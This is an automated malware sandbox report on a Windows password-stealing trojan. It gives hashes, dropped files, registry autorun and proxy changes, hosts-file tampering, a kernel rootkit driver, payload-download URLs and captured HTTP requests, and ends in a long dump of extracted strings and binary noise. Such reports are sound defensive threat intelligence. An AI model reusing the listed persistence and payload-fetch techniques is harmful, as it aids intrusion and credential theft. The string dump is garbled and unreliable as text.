Trojan.Win32.FlyStudio_60883406fe
Gen:Variant.Symmi.77281 (BitDefender), Trojan.Win32.Agent.nfaquv (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Hosts.41987 (DrWeb), Gen:Variant.Symmi.77281 (B) (Emsisoft), Artemis!60883406FEE1 (McAfee), SecurityRisk.gen1 (Symantec), Trojan.Sisproc (Ikarus), Gen:Variant.Symmi.77281 (FSecure), Win32:Adware-gen [Adw] (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R002C0WKL17 (TrendMicro), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Adware
The description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: 60883406fee1e16d32cf3c9f19b2c572
SHA1: f40ae64d0f7f59fee732ef9c0a86322a48e7ac0d
SHA256: 4a1e1c4f036425147dd45d906d68c66ff97cda9f5f36f65ee3c02a9a7b658b1c
SSDeep: 49152:h63BcmkexincwEoiMdckGzX8x0YiOAirW8KPhISVe9s6Ezj0a/zMyf/8eq Tiq06:wNkex4ONQckmjYiqrRGhI2eCpzH/VzqY
Size: 2692608 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-03 20:54:18
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
29c2bf.exe:3248
The Trojan injects its code into the following process(es):
%original file name%.exe:1828
2bcd58.exe:2216
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (506 bytes)
The process 29c2bf.exe:3248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\1.sys.rar (1994 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2835 bytes)
The process 2bcd58.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\drivers\etc\hosts (826 bytes)
Registry activity
The process 29c2bf.exe:3248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\System\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled" = "2"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process 2bcd58.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following reference to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"
Dropped PE files
MD5 | File path |
---|---|
1e249c45cd2a57640a50bdd840356b66 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar |
84ce8105f2b3b7ac55b824ecfba670e6 | c:\Windows\29c2bf.exe |
e25533277b22c9d342ac26cfebb4f9b8 | c:\Windows\System32\2bcd58.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses.
The modified file is 2044 bytes in size. The following entries are added to the hosts file:
Rootkit activity
Using the driver "%System%\SafeWall.sys", the Trojan controls the loading of executable images into memory by installing a load-image notifier.
The Trojan installs the following kernel-mode hooks:
NtDeviceIoControlFile
Propagation
VersionInfo
Company Name:
Product Name:
Product Version: 1.1.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description:
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 1957888 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 1961984 | 2445312 | 2442240 | 5.45091 | d92a56db59c1b6ac75f6dd1e38c1a16b |
.rsrc | 4407296 | 249856 | 249344 | 4.74163 | 364a608418d22be336186b3e104924f6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
hxxp://x6.tianyuanfalan.com/Config.rar
hxxp://x6.tianyuanfalan.com/SafeWall.rar
www.hqkjwy.com
teredo.ipv6.microsoft.com
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /Config.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: x6.tianyuanfalan.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 13 Jul 2017 07:45:01 GMT
Accept-Ranges: bytes
ETag: "304dfbeeabfbd21:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 13 Feb 2018 14:45:33 GMT
Content-Length: 0
GET /SafeWall.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: x6.tianyuanfalan.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 29 Apr 2015 01:58:16 GMT
Accept-Ranges: bytes
ETag: "0ac3f51f82d01:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 13 Feb 2018 14:45:33 GMT
Content-Length: 24112
The Trojan connects to the servers at the following location(s):
H.data
.reloc
pk.fujianhuafeng.com
hXXp://pk.fujianhuafeng.com:88
ECInf->Key%x
Hash%x
ECInf->FileBufferLen%d
119.145.148.
162.212.181.
192.126.127.
125.88.181.
183.60.200.
45woool.com
44woool.com
zhaowoool.com
zhaocs.com
huocs.com
fireol.com
8cs.com
jielesh.com
woool2017.com
600sf.com
xlcomic.com
021sjjc.com
45ci.com
bdtiandao.com
lke5.com
45woool.org
zjlscnc.com
guanmei2008.com
dtggc.com
93u.com
woool2sf.com
chinahuaman.com
176fgcqsf.com
shaibar.com
ucwoool.com
65535cs.com
quwoool.com
88woool.com
sf999.com
fhdlq.com
28pk.com
ggwoool.com
wooolsf.com
5b.com
HTTP/1.1 301 Found
Location: %s
c:\safewall\safewall_x86\objfre_win7_x86\i386\SafeWall.pdb
KeDelayExecutionThread
ZwDeleteKey
ZwOpenKey
ntoskrnl.exe
KeStallExecutionProcessor
HAL.dll
.pdata
Hash %x
ECInf->Key %x
ECInf->BB %x
in line:%d
c:\safewall\safewall_amd64\fucksys.c
at file:%s
c:\safewall\safewall_amd64\objfre_win7_amd64\amd64\SafeWall64.pdb
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
6#6-6;6{6
: :<:@:\:`:
hXXp://VVV.360.cn/superaid/index.html
fhdlqxf.exe
%s\Drivers\UnlockCallback_x64.sys
C:\Windows\SysWOW64\drivers\UnlockCallback_x64.sys
%s\Drivers\UnlockCallback.sys
C:\Windows\System32\drivers\UnlockCallback.sys
c:\Windows\fhdlqxf.txt
C:\Users\Blackeyes\Documents\Visual Studio 2008\Projects\PassPhoenix\Release\PassPhoenix.pdb
CertGetNameStringA
CryptMsgGetParam
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CryptMsgClose
CRYPT32.dll
MSVCR90.dll
_amsg_exit
_acmdln
_crt_debugger_hook
c:\users\dumingqiao\desktop\source\objfre_win7_x86\i386\EnumRemoveCmpCallback.pdb
7%7U7
c:\users\dumingqiao\desktop\source\objfre_win7_amd64\amd64\EnumRemoveCallback.pdb
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
2"2(2.242:2@2
Software\chuanshi\web
\Data\config\ItemCfg.INI
\Data\config\default\bestitem.INI
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://VVV.hqkjwy.com:88/h.txt
116.211.24.226
vreport
windows
Battle.net
$Recycle.Bin
data\woool.dat.update
Software\Microsoft\Windows\ShellNoRoam\MUICache
\0-49-3d.nmp
dWEbo
úG0
n#e.jzPxt
.Dt[:js
U#y.aPKwH
]4O%UMp&
2cpÞ
g^.Lt
=.Rx>/
V=.ev&2
.WKM\-
t%DkT
.rO@]
V.rP?
CE.rC
.NaEb
.qPzM
.oKty[
M.nN-H
fB%s:
Q~(%c
8.Ww4
P.Dy4
" .eXqit
Yh2%Ud
S.jLu
V\jiangjunling01.nmp
\jiangjunling02.nmp
Oi%xK_<
^t%dk
-d}Gt
3s4%U
\wuxing.nmp
%sBdN
%sJdN
:1975/08/21
Http://
Adobe Photoshop CS2 Windows
2011:12:22 11:54:23
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">
xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">
<xap:CreatorTool>Adobe Photoshop CS2 Windows</xap:CreatorTool>
xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">
<stRef:documentID>adobe:docid:photoshop:4de4def4-ecd0-11e0-9a10-a9350357c235</stRef:documentID>
xmlns:dc="hXXp://purl.org/dc/elements/1.1/">
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
.fM,k
.kp:S
?idWF.fE
-0 /2#25"27$6;#7>"7?#=C$@F&CJ*FM-IP0JQ/KQ1MS1NT4PW3OV4PW6RY7SZ8T[6Q[7SZ8TZ7SZ7SZ5QW4QT5QW4OY3PW4QX3PW3PW3PW3PW4QX4PW4PV7SY7SZ6RY7SZ7SZ6RY7SZ8SV4PV3PW2OV4PW5QX4PW3OV3PW4PW3OV5PZ2OV4PW6RX6SZ9SY7SZ7SZ8T[6SY8TZ4PV4PV4PW4PZ4PZ3OY3OY3PW3OY5PZ4NZ5PZ4OY4OY5PZ4OY5QX7SZ:UX7SY7SZ7SZ7SY7SZ6RY-IS4RU4OY:TZ.JT
.Zv|Qkw
-2#16"27$49"6=$9@$>D&@F(DK)EL,HO-IP0KU2MW3OV3OV3OV5QX6RX7SY7SY7SZ8S]7SZ7SY8TZ3OU5QX4PV4PV1QV0PU3PV4QW2OV3PW1NU4QX3OV7SZ5QX7SZ7SZ6RY8T[6RY7SY3OU5QW4PW4PV5QW5RX3PV4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3QT3PV3PV3PW5QX3OV5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT
-2!16"27$49"6=%9@$>E$@G(DK)DN*FP-IS/JT3NX4PW3OV3OV4PW6RY7SZ7SZ7SZ8T[7SY5RX8TZ3OU5QW4PW4PV0PV/OT4QW4QW1NU5RY1NU4QX4PW7SZ6RY6RY7SZ6RY8T[7SZ8T[2NU5QX3OV4PV5QW4RU2PS4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3PV3PV3PV3PW4PW5QX5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT
###$$$"""$$$&&&
!!! !!! """ """###!!!
|||___^^^"""
...---,,,--- ,,,,,,,,,......---...,,,---...---///...111...000222000///...000HHHJJJEEEDDD444,,, 111.........111000>>>EEEEEE???444......111 ///???EEEGGGEEE555000000.........111111000---///BBBFFFCCCEEE555000 ,,,,,,...444<<<BBBGGGAAA...------...---///111...---EEEKKKMMMOOO888/////////--- ///000...111 000///***///---,,,///,,,...KKKKKKMMMCCC???333 ***---,,,,,,------...///..................---------//////------///***,,,,,,FFF&&&
???<<<222444555666
777666333777
@@@<<<333888666555
999???@@@???>>>@@@
%%%XXXXXXXXXLLL
...RRR]]]^^^\\\\\\___^^^JJJ
999888666444
888999000
!!!999;;;===:::)))
...vvv
[[[(((&&&|||
]]]___"""
###$$$%%%$$$%%%
/ /2"14"36i&8=$8@%<D'@J'BL)DN,HO.JQ/KR1MT1MW2OV2OV3PW7SZ7SZ7SZ6RY7SY7SY7SY7SY4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX4PW4PW5PZ7R\9SZ9SY9SY9SY7SY7SZ9SY4PW3OY5RY4PW3OV4OY4PZ4OY6PW4PW4PW5QX4PV6RX7SY7SY7SY7SZ7SZ7SZ7SZ4PW5QX4PW5QW4PV4PV5QX3PW4PW7QX4OY5PZ4OY5PZ4PW4PW4PW6RY9SY7SZ7SZ6RY9SY:T[6RY/KU3PW4PZ9SY/KR
05!38#5:%7<&8=%<D&@G*DK*FM,HO.JQ0KU1LV2NU3OV3OV4PW7SY7SY7SY7SZ:T[9SZ6RY8T[3PW5QX4PW4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX7SZ7SZ7SZ7SZ7SZ7SZ7SZ5T]4PZ4OY6OY4OY4OY3PW1QW3NZ3NZ3NZ3NZ3NZ3NZ6Q]7R^9SZ7QX9R\:T[6RY7SZ3NX4OY3OV4PW4PW4PW4PW5QX4PW3PV3PW4QX3OY4OY4OY3NX4PW7SZ9U[6RY7SZ8T[8T[6RY8T[.JQ4QW4PW9TW/JT
)0.JQ 7?Dbm
}}}|||~~~
,,,!!!???...XXX
...rrr
......,,,---,,,---------...000......---///...---/////////////////////000...DDDFFFFFFGGG---IIICCCBBB>>>777444...//////000111///222,,,///000......///000555///000000HHHIII<<<000.../////////000...///000 :::FFF777 ,,,......666<<<BBBIII===///------... ///---...---EEEKKKMMMMMM666000///...---...///111///...---222......,,,,,,000000------JJJKKKNNNFFFAAA111---))),,,,,,...---......///.........///...---,,,,,,---...111,,,,,,000 ,,,,,,EEE&&&
>>>===444555444666
SSSHHH"""
---444333555444
>>>999444666555444
...555:::444666:::
000:::888999:::888<<<888
???@@@===///
...NNN;;;;;;<<<<<<<<<<<<<<<<<<<<<======<<<:::===<<<===>>>===???===>>>===999<<<<<<EEE'''
...SSSGGG))) !!!
...lll!!!
;;;777000
:::999888999
...jjjlllnnnkkklllkkklllnnnjjjnnnkkklllmmmnnnjjj
###%%%###$$$%%%
|||{{{|||}}}~~~|||~~~
!!!###***
@@@```~~~
999(((555>>>
111""">>>$$$
888///,,,
111...///
;;;---111
(((444((()))
EEE444111111...LLL
333 --- ...OOO
"""'))***$$$
$$$***)))555999)))%%%
222:::888555666[[[
%''(%'$#%
$'#(&&%&(
!!!###$$$(((&&&
"""'''((("""
"""''' """
$$$%%%'''%%% ###(((***$$$ )))...!!!
!!!888...;;;
!!!&&&!!!
&&& (((,,, ,,,)))%%%""" $$$
"""&&&$$$###$$$'''&&&!!!
$$$ ,,,((($$$ &&&
!!!'''"""
$$$'''&&## %%%$$$
"""'''***'''&&& $$$
###&&&%%% %%%(((***$$$!!!%%%
'''...111 ###
&&& &"*(('''$$$'''"""
$$$###"""%%%)))'''###)))111555444333
###%%% !!!$$$..."""(((&&&
%%D4111
%!"%"(((###"""###!!!
"""...((($$$&&&'''"""
(*3.1./1346$!%
)))$$$&&&(((%%%
,,,((( ((()))!!!
&&&'''&&&!!!
###((( %%%"""
###---***!!!
''',,,"""
222^^^%%%
%%%!!!###%%%$$$
""")))&&& ###
""" $$$)))%%%((()))!!!
!!!$$$'''###
*&'(((&&&'''%%%$$$"""
)))""" !!!&&##
$$$%%%&&&"""
!!!'''&&##%%%
,,,%%% ###!!!"""
###'''"""
"""'''$$$ ###
''')))***,,,)))!!!&&&
$&&&%'&$$'''
%%f6 ***$$$!!!###!!!
#"&'&((&&!&%'%%,**###"""###!!!
! # "#!!!
$),)""" $$$!!!
"""'''&&&
%%%..."""
FFF???)))<<<;;;...EEEKKK999TTT```,,,
(((...CCCmmmdddddd222
'''(((''''&(!$!!"
###$$$"""
~~~```@@@
'''666''')))
000@@@~~~
)))***"""
'''.00,**)))%##
. )022230...'))
-& ""!#
"'()(%!"$
###'''(((###
$$$%%%'''%%% ###(((***$$$ )))...!!!
$$$(((&&&)))--- ((($$$ &&##
&&&***(((,,, ,,,)))%%%""" $$$
*=@%CO
!'#$&&&$&&'''$$$'''"""
***55589=866
" !#%&"(((###"""###!!!
"""!!!%%%'''
'&(((('''&&&%%%###"""
!!!###%%%'''(((&&&$$$!!!$$$)))&&##%%%'''###"""$$$!!!
%##%(((#%%&'$
$&&%$&(%#"($ ###"""###!!!
" () """ $$$!!!
'&()(%&')%%%%"$
--- ***___
888!!!888%%%...PPP
999'''555>>>
111"""===%%%
999///,,,
(((666((()))
'''000 )))$$$
---000222...)))
...qqq???
###((("""
!!!111!!!
!!!###%%%'''&&&
...;;;|||
"""''',,,"""
""")))***!!!
$$$%%%'''&&& ###)))***$$$ )))...!!!
$$$'''&&&)))---,,,((($$$ %%%###
!!!%%%!!!
$$$***,,,((($$$ &&&
$$$'''%%%### %%%$$$
&&& '''!!! )))&&&
&&&!!!$$$
###&&&%%%
%%%(((***$$$"""&&&!!!
'''...111 ###
###%%% !!!$$$..."""((('''
%%33111
(((555;;;777
!!!###&&&)))&&&"""%%%''' ,,,''',,,)))((('''###
"""...(((###&&&'''"""
!!!%%% ((($$$ ###$$$%%%!!!
###''',,,%%%"""
###---)))!!!
''',,,!!!
%%% $$$%%%$$$
""")))''' $$$
"""'''###!!!$$$(((###
""" %%%)))%%%((()))!!!
"""$$$(((###
&&&((('''&&&%%%###"""
###&&&(((,,, ***)))&&&
!!!###%%%'''(((&&&$$$!!!$$$)))&&&$$$%%%'''###"""$$$!!!
)))""" """&&##
!!!$$$###
'''&&##%%%
!!!&&&(((&&&"""!!!
''')))***,,,(((!!!&&&
$$$%%%(((%%%&&&
%%%&&&%%%""",,,###"""###"""
!!!""" """(((""" $$$!!!
%%%---!!!
GGG@@@)))<<<;;;...FFFKKK999SSS___,,,
&&&"""'''&&##
(((...CCCmmmdddccc222
'''&&&'''$$$"""
###%%%"""
-2!16 27!6:%7<(7?%<D&@G'CJ)EL,HO/KR/LS1NU2MW3NX3NX4PW7SY7SZ7R\6Q[6SZ5RY6RY8T[2NU4PW4PW4QX4PW5QX3OV4PW4PW4PW5QX4PW4PW7SZ8T[6RX8TZ7SY8TZ7SY6RY5QX4PW5QX3PW4PW3PV5QW3PW4PW4PW4PW3OV4PW7SY7SZ7SZ7SZ7SZ7SZ5RY7SZ3PV3OU4OY4PW4PW6PW4PW3OY3NX6PW5QX4OY5PZ5PZ4PW4PW4PW7SZ9SY7SY6RX7SY7SY8RX8T[.JT3NZ7QW7SY,LR
(.Vju
/4!08%4<%7<$9=%<C&@F)CI)EK,HO-JQ.JT1MW2OV2OV2OV3PW7SZ7SZ6RY6RY7T[6SZ6RY8T[3OV4PW4PW4PW3PW5QX3OV4PW3PW3PW3OV4PW4PV7SY7SY8TZ8TZ6RX8TZ8TZ7S]3OY4PW4PW3OV2OV4QX0PV3OV4PW3OV4PW5QX3OV7SZ7SZ8RY8RY6RY7SZ7T[7SZ5QX4PW4PW4PW6RY3OV4PW5QX2NU4QX4PV3OU4PW6PW6RY5QX5QX7SZ8TZ9U[6RY7SZ:T[7SZ7SZ/KR5PZ5OV8RY.KQ
]{~.JQ"<BY{
,1 05#38$49%7<'9>%<D(?G)CI EK,HO.JQ0LS2NU3OV3OV3OV4QW6RX7SZ7SZ7SZ8T[7SZ6RY7SZ5QX5QX4PW4PW4QX2OV4QX3PW4QW4QW3PV4QW6RY6RY7SZ7SZ6RY8T[7SZ7SZ7R\4OY3OY4QX2OV2OV3PW3PW4PV5QX4PW4PW4PW4PV5QW8TZ7R\6Q[7SZ8T[6SZ6SZ4PZ3OY4PW3OV7QX6PW5OV6PW3OV5QX3PV3PV3OU4PV4PV3OU4PV7SY6SZ7SZ7SZ7T[6SZ9U\5QX1MT3PW3PW6RX/HX
/// ???...XXX
"""###"""###"""!!!
~~~___^^^"""
......---...------...---...///......---......---...------...//////---...///...000EEECCCDDDCCC///111///333//////333555GGGHHHGGGGGG......111000///666<<<444000111000//////000...///...999FFFFFF@@@999333,,,111......---***...444;;;<<<>>>888,,,---...000000...,,,///,,,666MMMMMMLLLDDD888000111---...111---//////---///000------...LLLJJJMMMLLL---,,,...???MMMMMMKKK999,,, ---...---/////////.........///---,,, ------...000--- ---,,,DDD(((
((('''&&&))),,,)))(((
%%%***'''
<<<:::555444888
???<<<333555&&&
>>>@@@777888
...DDD;;;:::;;;777
...KKK@@@===@@@???!!!
...CCC
...TTTAAAAAABBBAAA!!!
...LLL
444\\\...
444,,,000---
...mmmjjjkkkllllllmmmnnnmmmlllllljjjmmmooommmkkkmmmkkkooolllnnnmmmlllccceeeeeebbb'''lllccc
$$$%%%###%%%###
)1.JQ
0 .3"14"36#5:$8?$9=#=D&@G'BL)DN,HO-IP/KR2NU2NU3OV3OV5QX5QX7SZ6R\6R\7SY7SY7SZ7SZ5QW4PV4PW4OY4OY4OY4OY4OY4PW4PW4PV3OU3PW6SZ7T[6RY7SZ7SZ7SZ7SZ6RY5QW3OV4OY5QX3NX4NZ4OY4PZ4PW4PW3PW4PZ5QX7SY7SY7SZ7SZ7SZ7R\6SZ6RY4PW4PV4PW4PW4PW4QX3PW4QX3PV4PV4PW4PW4PW4PW4PW4PW5QX9SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ
-IZ.J[.KZ0JZ'>T
.1!25"27!38&8=%:>&=E%?F EL)DN-HR-HR0JV1KW1NT3OU3OU4PV6SV6SV6RX:TZ7T[6SZ5QX8T[2NU6RY4PW4PW4OY5PZ2LX5O[5O[3MY5O[4NZ5QW6RX7SY8TZ6RX7SY6RX7SY7R\6Q[4OY1NU4PZ4PZ4PZ5QX4PW5QX4PW5QX4PW4PW8TZ7SY7SY7SZ7SZ7SY6RX6RX4PW4PW4PW3OV6PW6PW4PW4PW2NT5QW3PW3PW4OY5PZ3NX3MY5PZ6Q[8TZ6RX7SY8TZ8U[7SY7SY.JQ3QT2NX9TW.IS
,/!/4"14"36%5:&8=$9=#=D&@G'BL)DN,HO.JQ/KR1MT2NU3OV3OV5QX4QX7SZ6R\6R\7SY7SY7SZ7SY5QW4PV4PW3OY4OY3NX3NX4OY4PW4PV4PV3OV4PW6RY7SZ6RY7SZ7SZ7SZ6RY6RY5QX4PW4NZ4QX4OY3OY3PW5RY4PW3PW3OY3PW4PW7SY7SZ7SZ7SZ7SZ7SZ7SZ6RY4PV4PV4PV4PW4PV2OV3PW3PV3PW4PV4PW3PW3PW3PW4PW4PW5QX7SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ
&CR(CW'AQ DT*BT.EU)GS*DQ*CS'@R*DQ
.Xu1GY.KZ.I]
.GY1GY-IZ*IX&?O
$$$&&##"""$$$
...###@@@...YYY
***,,,000
///...
!!!111000555444\\\
###222777
)))444666999444
999777;;;888
666555!!!
666...888;;;[[[
888:::===???
666222;;;???^^^
Ýdlllnnnlllkkklllmmmlllmmmmmmkkkkkklllmmmmmmmmmnnnnnnkkknnnmmmkkkmmmuuu
}}}___```
$$$%%%$$$%%%$$$
\\\hhhppp111''' *** ===...ZZZ
}}}---,,,
(7),01444
'9=82<.342
9T.mn,
%fkk4
{`.cF
-.VU2
1975/08/21
, #&')*)
-0-(0%()(
.In4i.o-
1900/01/01
2007:02:07 02:59:30
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
(*.htm;*.html)|*.htm;*.html
its:%s::%s
x86 Family %s Model %s Stepping %s
X-X-X-X
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
c:\%original file name%.exe
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
#include "l.chs\afxres.rc" // Standard components
WinExec
RegCreateKeyA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetKeyState
GetKeyboardType
CreateDialogIndirectParamA
UnhookWindowsHookEx
